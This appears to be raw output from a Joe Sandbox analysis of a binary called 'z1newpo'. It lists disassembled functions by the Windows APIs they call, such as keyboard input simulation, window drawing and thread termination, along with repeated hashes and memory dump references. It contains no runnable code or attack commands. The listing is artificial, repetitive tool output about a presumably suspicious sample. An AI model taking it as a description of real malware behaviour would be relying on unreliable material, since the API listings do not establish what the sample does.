                                                    • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strncmp
                                                    • String ID: >$U$\
                                                    • API String ID: 2666721431-237099441
                                                    • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                    • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                    • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                    • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044C570
                                                    • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                    • String ID:
                                                    • API String ID: 2221674350-0
                                                    APIs
                                                    Similarity
                                                    • API ID: _wcscpy$_wcscat
                                                    • String ID:
                                                    • API String ID: 2037614760-0
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                    • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                    Similarity
                                                    • API ID: Variant$Copy$AllocClearErrorLastString
                                                    • String ID:
                                                    • API String ID: 960795272-0
                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                    Similarity
                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                    • String ID:
                                                    • API String ID: 4189319755-0
                                                    APIs
                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                    • String ID:
                                                    • API String ID: 1976402638-0
                                                    APIs
                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    Strings
                                                    Similarity
                                                    • API ID: Variant$Copy$ClearErrorLast
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 2487901850-572801152
                                                    APIs
                                                    • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                    Similarity
                                                    • API ID: Window$Enable$Show$MessageSend
                                                    • String ID:
                                                    • API String ID: 1871949834-0
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    APIs
                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                    • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                    • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                    • SendMessageW.USER32 ref: 00471AE3
                                                    • DestroyIcon.USER32(?), ref: 00471AF4
                                                    Similarity
                                                    • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                    • String ID:
                                                    • API String ID: 3611059338-0
                                                    APIs
                                                    Similarity
                                                    • API ID: DestroyWindow$DeleteObject$IconMove
                                                    • String ID:
                                                    • API String ID: 1640429340-0
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • _wcslen.LIBCMT ref: 004438CD
                                                    • _wcslen.LIBCMT ref: 004438E6
                                                    • _wcstok.LIBCMT ref: 004438F8
                                                    • _wcslen.LIBCMT ref: 0044390C
                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                    • _wcstok.LIBCMT ref: 00443931
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                    • String ID:
                                                    • API String ID: 3632110297-0
                                                    • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                    • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                    • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                    • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteMenuObject$IconWindow
                                                    • String ID:
                                                    • API String ID: 752480666-0
                                                    • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                    • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                    • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                    • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                    • String ID:
                                                    • API String ID: 3275902921-0
                                                    • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                    • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                    • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                    • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                    • String ID:
                                                    • API String ID: 3275902921-0
                                                    • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                    • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                    • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                    • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                    • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                    • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                    • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                    APIs
                                                    • SendMessageW.USER32 ref: 004555C7
                                                    • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                    • String ID:
                                                    • API String ID: 3691411573-0
                                                    • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                    • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                    • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                    • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                    APIs
                                                      • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                      • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                      • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                      • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                    • LineTo.GDI32(?,?,?), ref: 004472AC
                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                    • LineTo.GDI32(?,?,?), ref: 004472C6
                                                    • EndPath.GDI32(?), ref: 004472D6
                                                    • StrokePath.GDI32(?), ref: 004472E4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                    • String ID:
                                                    • API String ID: 372113273-0
                                                    • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                    • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                    • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                    • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0044CC6D
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                    • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                    • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                    • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                    APIs
                                                    • __getptd.LIBCMT ref: 0041708E
                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                    • __amsg_exit.LIBCMT ref: 004170AE
                                                    • __lock.LIBCMT ref: 004170BE
                                                    • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                                    • _free.LIBCMT ref: 004170EE
                                                    • InterlockedIncrement.KERNEL32(016A2DB0), ref: 00417106
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                    • String ID:
                                                    • API String ID: 3470314060-0
                                                    • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                    • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                                    • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                                    • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                    • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                    • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                      • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                    • String ID:
                                                    • API String ID: 3495660284-0
                                                    • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                    • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                    • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                    • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                    APIs
                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Virtual
                                                    • String ID:
                                                    • API String ID: 4278518827-0
                                                    • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                    • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                    • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                    • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
